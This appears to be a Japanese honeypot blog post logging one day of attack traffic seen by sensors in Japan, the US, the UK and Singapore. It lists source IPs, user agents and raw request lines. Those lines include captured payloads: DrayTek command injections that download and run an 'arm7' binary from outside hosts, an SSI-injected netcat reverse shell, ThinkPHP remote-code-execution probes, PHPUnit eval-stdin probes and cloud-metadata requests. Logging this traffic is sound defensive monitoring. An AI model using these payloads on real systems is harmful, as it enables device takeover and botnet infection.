2020/04/12 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2020/04/12分です。

特徴

Location：JP

Adobe ColdFusionの脆弱性を狙うアクセス
DrayTek製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
polaris botnetによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
18[.]179[.]20[.]5に関する不正通信
を確認しました。

Location：US

DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
polaris botnetによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
ZmEuによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。

Location：UK

DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
polaris botnetによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
Gh0stRATのような動き
を確認しました。

Location：SG

DrayTek製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
XTCによるスキャン行為
zgrabによるスキャン行為
を確認しました。

他

アクセス数推移

JP：総アクセス数：95 (前日比：-181)
US：総アクセス数：22 (前日比：0)
UK：総アクセス数：35 (前日比：-1)
SG：総アクセス数：20 (前日比：-23)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
6	5.101.0.209	Russia
1	24.217.116.164	United States
34	44.225.84.206	United States
10	49.7.112.99	China
1	80.82.78.104	Netherlands
1	92.222.24.46	France
1	94.191.113.28	China
10	111.229.1.215	China
1	118.70.190.137	Vietnam
3	140.143.16.158	China
1	151.99.146.218	Italy
1	162.243.133.179	United States
2	185.153.199.118	Republic of Moldova
2	190.0.57.46	Colombia
1	192.241.236.131	United States
1	200.94.52.243	Mexico
10	213.136.69.132	Germany
9	223.166.32.75	China

UserAgent一覧

件数	UserAgent
27	-
14	AWS Security Scanner
4	Go-http-client/1.1
6	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
9	Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
31	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2	Mozilla/5.0 zgrab/0.x
2	polaris botnet

リクエスト内容一覧

件数	Method	Request	Protocol
2		\x03
10		\x16\x03\x01
10	CONNECT	18[.]179[.]20[.]5:80	HTTP/1.0
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/CFIDE/administrator/	HTTP/1.1
1	GET	/HNAP1/	HTTP/1.1
1	GET	/SQLite/main.php	HTTP/1.1
1	GET	/SQLiteManager-1.2.4/main.php	HTTP/1.1
1	GET	/SQlite/main.php	HTTP/1.1
3	GET	/TP/html/public/index.php	HTTP/1.1
4	GET	/TP/index.php	HTTP/1.1
5	GET	/TP/public/index.php	HTTP/1.1
1	GET	/agSearch/SQlite/main.php	HTTP/1.1
3	GET	/elrekt.php	HTTP/1.1
3	GET	/html/public/index.php	HTTP/1.1
1	GET	/hudson	HTTP/1.1
3	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	HTTP/1.1
3	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
4	GET	/latest/dynamic/instance-identity/document	HTTP/1.1
1	GET	/main.php	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
3	GET	/public/index.php	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/sqlite/main.php	HTTP/1.1
1	GET	/sqlitemanager/main.php	HTTP/1.1
1	GET	/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php	HTTP/1.1
4	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	GET	http://[::ffff:a9fe:a9fe]/	HTTP/1.1
2	GET	http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document	HTTP/1.1
2	GET	http[:]//169[.]254[.]169[.]254/	HTTP/1.1
2	GET	http[:]//169[.]254[.]169[.]254/latest/dynamic/instance-identity/document	HTTP/1.1
2	GET	http[:]//example[.]com/	HTTP/1.1
2	POST	/boaform/admin/formPing	HTTP/1.1
1	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1
4	POST	/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a	HTTP/1.1
3	POST	/index.php?s=captcha	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
4	5.101.0.209	Russia
1	23.95.0.119	United States
1	80.82.78.104	Netherlands
1	83.39.125.147	Spain
1	83.110.104.31	United Arab Emirates
1	83.110.147.165	United Arab Emirates
1	84.108.25.20	Israel
7	122.51.244.71	China
1	141.98.81.6	Panama
1	162.243.128.170	United States
1	179.53.150.142	Dominican Republic
1	192.241.238.137	United States
1	200.125.164.46	Trinidad and Tobago

UserAgent一覧

件数	UserAgent
5	-
1	Go-http-client/1.1
4	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2	Mozilla/5.0 zgrab/0.x
2	XTC BOTNET
6	ZmEu
1	curl/7.67.0
1	polaris botnet

リクエスト内容一覧

件数	Method	Request	Protocol
1	CONNECT	smtp[.]mail[.]ru/:25	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/MyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/hudson	HTTP/1.1
1	GET	/incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%2023.95.0.119%2029312%200%3C/tmp/s	/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e\|HTTP/1.0
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	HTTP/1.1
1	GET	/myadmin/scripts/setup.php	HTTP/1.1
1	GET	/phpMyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/phpmyadmin/scripts/setup.php	HTTP/1.1
1	GET	/pma/scripts/setup.php	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/w00tw00t.at.blackhats.romanian.anti-sec:)	HTTP/1.1
1	GET	HTTP/1.1
1	POST	/boaform/admin/formPing	HTTP/1.1
3	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1
3	POST	/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//192[.]3[.]45[.]185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
3	24.1.44.82	United States
1	31.215.102.137	United Arab Emirates
1	50.195.155.21	United States
1	66.240.205.34	United States
1	78.187.87.245	Turkey
1	80.82.78.104	Netherlands
1	85.93.20.170	Germany
1	108.238.143.30	United States
1	158.69.172.231	Canada
1	162.243.128.104	United States
1	178.54.86.119	Ukraine
1	178.219.173.3	Ukraine
1	181.120.188.152	Paraguay
4	185.142.236.34	Netherlands
1	185.153.199.118	Republic of Moldova
1	189.213.27.104	Mexico
1	190.152.144.202	Ecuador
1	192.241.237.227	United States
1	201.54.254.71	Brazil
11	223.240.80.44	China

UserAgent一覧

件数	UserAgent
14	-
2	Go-http-client/1.1
1	Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
1	Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2	Mozilla/5.0 zgrab/0.x
3	XTC BOTNET
2	polaris botnet
1	python-requests/2.19.1

リクエスト内容一覧

件数	Method	Request	Protocol
2		-
1		Gh0st\xad
2		\x03
1	GET	/.well-known/security.txt	HTTP/1.1
1	GET	/HNAP1/	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/elrekt.php	HTTP/1.1
2	GET	/favicon.ico	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	/hudson	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
1	GET	/sitemap.xml	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
2	POST	/boaform/admin/formPing	HTTP/1.1
5	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1
1	POST	/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//192[.]3[.]45[.]185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a	HTTP/1.1
4	POST	/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a	HTTP/1.1
1	POST	/index.php?s=captcha	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.39.173.31	Italy
1	80.82.78.104	Netherlands
1	85.93.20.170	Germany
1	96.73.71.5	United States
10	122.224.131.186	China
1	154.70.134.71	South Africa
1	162.243.129.134	United States
3	185.153.199.118	Republic of Moldova
1	202.184.112.35	Malaysia

UserAgent一覧

件数	UserAgent
6	-
2	Go-http-client/1.1
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	Mozilla/5.0 zgrab/0.x
2	XTC

リクエスト内容一覧

件数	Method	Request	Protocol
4		\x03
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/elrekt.php	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	/hudson	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
3	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1
2	POST	/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a	HTTP/1.1
1	POST	/index.php?s=captcha	HTTP/1.1